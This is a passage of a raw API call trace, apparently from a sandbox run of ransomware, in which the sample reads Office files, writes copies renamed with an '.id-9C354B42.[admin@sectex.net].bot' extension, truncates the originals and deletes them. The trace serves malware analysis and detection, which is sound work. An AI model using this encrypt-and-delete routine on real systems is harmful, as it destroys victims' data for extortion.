	[0150.242] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\proprpt.vsl")) returned 1
	[0150.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL") returned 59
	[0150.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL") returned 59
	[0150.243] lstrlenW (lpString=".doc") returned 4
	[0150.243] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0150.243] lstrlenW (lpString=".docx") returned 5
	[0150.243] lstrcmpiW (lpString1=".docx", lpString2="T.VSL") returned -1
	[0150.243] lstrlenW (lpString=".pdf") returned 4
	[0150.243] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0150.243] lstrlenW (lpString=".xls") returned 4
	[0150.243] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0150.243] lstrlenW (lpString=".xlsx") returned 5
	[0150.243] lstrcmpiW (lpString1=".xlsx", lpString2="T.VSL") returned -1
	[0150.243] lstrlenW (lpString=".ppt") returned 4
	[0150.243] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0150.243] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL") returned 59
	[0150.243] lstrlenW (lpString=".zip") returned 4
	[0150.243] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0150.243] lstrlenW (lpString=".rar") returned 4
	[0150.243] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0150.243] lstrlenW (lpString=".bz2") returned 4
	[0150.244] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0150.244] lstrlenW (lpString=".7z") returned 3
	[0150.244] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0150.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL") returned 59
	[0150.244] lstrlenW (lpString=".dbf") returned 4
	[0150.244] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0150.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL") returned 59
	[0150.244] lstrlenW (lpString=".1cd") returned 4
	[0150.244] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0150.244] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL") returned 59
	[0150.244] lstrlenW (lpString=".jpg") returned 4
	[0150.244] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0150.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL") returned 59
	[0150.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL") returned 59
	[0150.350] lstrlenW (lpString=".doc") returned 4
	[0150.350] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0150.350] lstrlenW (lpString=".docx") returned 5
	[0150.350] lstrcmpiW (lpString1=".docx", lpString2="T.VSL") returned -1
	[0150.350] lstrlenW (lpString=".pdf") returned 4
	[0150.350] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0150.350] lstrlenW (lpString=".xls") returned 4
	[0150.350] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0150.350] lstrlenW (lpString=".xlsx") returned 5
	[0150.350] lstrcmpiW (lpString1=".xlsx", lpString2="T.VSL") returned -1
	[0150.350] lstrlenW (lpString=".ppt") returned 4
	[0150.350] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0150.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL") returned 59
	[0150.350] lstrlenW (lpString=".zip") returned 4
	[0150.350] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0150.350] lstrlenW (lpString=".rar") returned 4
	[0150.350] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0150.350] lstrlenW (lpString=".bz2") returned 4
	[0150.350] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0150.350] lstrlenW (lpString=".7z") returned 3
	[0150.350] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0150.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL") returned 59
	[0150.350] lstrlenW (lpString=".dbf") returned 4
	[0150.350] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0150.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL") returned 59
	[0150.350] lstrlenW (lpString=".1cd") returned 4
	[0150.350] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0150.350] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\PROPRPT.VSL") returned 59
	[0150.350] lstrlenW (lpString=".jpg") returned 4
	[0150.350] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0150.351] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0150.351] lstrlenW (lpString="SETLANG_COL.HXC") returned 15
	[0150.351] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0150.359] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=631) returned 1
	[0150.359] CloseHandle (hObject=0x25c) returned 1
	[0150.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_col.hxc")) returned 0x20
	[0150.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0150.360] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.360] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0150.361] GetLastError () returned 0x0
	[0150.361] ReadFile (in: hFile=0x25c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x277, lpOverlapped=0x0) returned 1
	[0150.436] WriteFile (in: hFile=0x38c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x280, lpOverlapped=0x0) returned 1
	[0150.437] ReadFile (in: hFile=0x25c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.437] WriteFile (in: hFile=0x38c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0150.437] SetEndOfFile (hFile=0x38c) returned 1
	[0150.437] CloseHandle (hObject=0x38c) returned 1
	[0150.437] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.437] SetEndOfFile (hFile=0x25c) returned 1
	[0150.440] CloseHandle (hObject=0x25c) returned 1
	[0150.440] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.440] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_col.hxc")) returned 1
	[0150.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC") returned 63
	[0150.440] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC") returned 63
	[0150.440] lstrlenW (lpString=".doc") returned 4
	[0150.440] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0150.441] lstrlenW (lpString=".docx") returned 5
	[0150.441] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0150.441] lstrlenW (lpString=".pdf") returned 4
	[0150.441] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0150.441] lstrlenW (lpString=".xls") returned 4
	[0150.441] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0150.441] lstrlenW (lpString=".xlsx") returned 5
	[0150.441] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0150.441] lstrlenW (lpString=".ppt") returned 4
	[0150.441] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0150.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC") returned 63
	[0150.441] lstrlenW (lpString=".zip") returned 4
	[0150.441] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0150.441] lstrlenW (lpString=".rar") returned 4
	[0150.441] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0150.441] lstrlenW (lpString=".bz2") returned 4
	[0150.441] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0150.441] lstrlenW (lpString=".7z") returned 3
	[0150.441] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0150.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC") returned 63
	[0150.441] lstrlenW (lpString=".dbf") returned 4
	[0150.441] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0150.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC") returned 63
	[0150.441] lstrlenW (lpString=".1cd") returned 4
	[0150.441] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0150.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC") returned 63
	[0150.441] lstrlenW (lpString=".jpg") returned 4
	[0150.441] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0150.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC") returned 63
	[0150.441] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC") returned 63
	[0150.441] lstrlenW (lpString=".doc") returned 4
	[0150.442] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0150.442] lstrlenW (lpString=".docx") returned 5
	[0150.442] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0150.442] lstrlenW (lpString=".pdf") returned 4
	[0150.442] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0150.442] lstrlenW (lpString=".xls") returned 4
	[0150.442] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0150.442] lstrlenW (lpString=".xlsx") returned 5
	[0150.442] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0150.442] lstrlenW (lpString=".ppt") returned 4
	[0150.442] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0150.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC") returned 63
	[0150.442] lstrlenW (lpString=".zip") returned 4
	[0150.442] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0150.442] lstrlenW (lpString=".rar") returned 4
	[0150.442] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0150.442] lstrlenW (lpString=".bz2") returned 4
	[0150.442] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0150.442] lstrlenW (lpString=".7z") returned 3
	[0150.442] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0150.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC") returned 63
	[0150.442] lstrlenW (lpString=".dbf") returned 4
	[0150.442] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0150.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC") returned 63
	[0150.442] lstrlenW (lpString=".1cd") returned 4
	[0150.442] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0150.442] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_COL.HXC") returned 63
	[0150.442] lstrlenW (lpString=".jpg") returned 4
	[0150.442] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0150.443] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0150.443] lstrlenW (lpString="SETLANG_F_COL.HXK") returned 17
	[0150.443] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0150.443] GetFileSizeEx (in: hFile=0x25c, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=114) returned 1
	[0150.443] CloseHandle (hObject=0x25c) returned 1
	[0150.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_f_col.hxk")) returned 0x20
	[0150.443] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x25c
	[0150.444] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.444] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.444] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c
	[0150.444] GetLastError () returned 0x0
	[0150.444] ReadFile (in: hFile=0x25c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x72, lpOverlapped=0x0) returned 1
	[0150.447] WriteFile (in: hFile=0x38c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0150.448] ReadFile (in: hFile=0x25c, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.448] WriteFile (in: hFile=0x38c, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0150.448] SetEndOfFile (hFile=0x38c) returned 1
	[0150.448] CloseHandle (hObject=0x38c) returned 1
	[0150.448] SetFilePointerEx (in: hFile=0x25c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.448] SetEndOfFile (hFile=0x25c) returned 1
	[0150.451] CloseHandle (hObject=0x25c) returned 1
	[0150.451] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.451] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_f_col.hxk")) returned 1
	[0150.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK") returned 65
	[0150.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK") returned 65
	[0150.452] lstrlenW (lpString=".doc") returned 4
	[0150.452] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0150.452] lstrlenW (lpString=".docx") returned 5
	[0150.452] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0150.452] lstrlenW (lpString=".pdf") returned 4
	[0150.452] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0150.452] lstrlenW (lpString=".xls") returned 4
	[0150.452] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0150.452] lstrlenW (lpString=".xlsx") returned 5
	[0150.452] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0150.452] lstrlenW (lpString=".ppt") returned 4
	[0150.452] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0150.452] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK") returned 65
	[0150.452] lstrlenW (lpString=".zip") returned 4
	[0150.452] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0150.452] lstrlenW (lpString=".rar") returned 4
	[0150.452] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0150.452] lstrlenW (lpString=".bz2") returned 4
	[0150.452] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0150.453] lstrlenW (lpString=".7z") returned 3
	[0150.453] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0150.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK") returned 65
	[0150.453] lstrlenW (lpString=".dbf") returned 4
	[0150.453] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0150.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK") returned 65
	[0150.453] lstrlenW (lpString=".1cd") returned 4
	[0150.453] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0150.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK") returned 65
	[0150.453] lstrlenW (lpString=".jpg") returned 4
	[0150.453] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0150.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK") returned 65
	[0150.453] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK") returned 65
	[0150.453] lstrlenW (lpString=".doc") returned 4
	[0150.453] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0150.453] lstrlenW (lpString=".docx") returned 5
	[0150.453] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0150.453] lstrlenW (lpString=".pdf") returned 4
	[0150.453] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0150.453] lstrlenW (lpString=".xls") returned 4
	[0150.453] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0150.453] lstrlenW (lpString=".xlsx") returned 5
	[0150.453] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0150.454] lstrlenW (lpString=".ppt") returned 4
	[0150.454] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0150.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK") returned 65
	[0150.454] lstrlenW (lpString=".zip") returned 4
	[0150.454] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0150.454] lstrlenW (lpString=".rar") returned 4
	[0150.454] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0150.454] lstrlenW (lpString=".bz2") returned 4
	[0150.454] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0150.454] lstrlenW (lpString=".7z") returned 3
	[0150.454] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0150.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK") returned 65
	[0150.454] lstrlenW (lpString=".dbf") returned 4
	[0150.454] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0150.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK") returned 65
	[0150.454] lstrlenW (lpString=".1cd") returned 4
	[0150.454] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0150.454] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_F_COL.HXK") returned 65
	[0150.454] lstrlenW (lpString=".jpg") returned 4
	[0150.454] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0150.454] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0150.454] lstrlenW (lpString="SETLANG_K_COL.HXK") returned 17
	[0150.454] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.476] GetFileSizeEx (in: hFile=0x3d0, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=113) returned 1
	[0150.476] CloseHandle (hObject=0x3d0) returned 1
	[0150.476] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_k_col.hxk")) returned 0x20
	[0150.479] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0150.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0150.480] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.480] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.480] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8
	[0150.480] GetLastError () returned 0x0
	[0150.480] ReadFile (in: hFile=0x3d0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x71, lpOverlapped=0x0) returned 1
	[0150.481] WriteFile (in: hFile=0x1b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0150.482] ReadFile (in: hFile=0x3d0, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0150.482] WriteFile (in: hFile=0x1b8, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0150.482] SetEndOfFile (hFile=0x1b8) returned 1
	[0150.482] CloseHandle (hObject=0x1b8) returned 1
	[0150.483] SetFilePointerEx (in: hFile=0x3d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0150.483] SetEndOfFile (hFile=0x3d0) returned 1
	[0150.485] CloseHandle (hObject=0x3d0) returned 1
	[0150.485] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0150.485] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\setlang_k_col.hxk")) returned 1
	[0150.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK") returned 65
	[0150.486] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\SETLANG_K_COL.HXK") returned 65
	[0150.486] lstrlenW (lpString=".doc") returned 4
	[0150.486] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0150.486] lstrlenW (lpString=".docx") returned 5
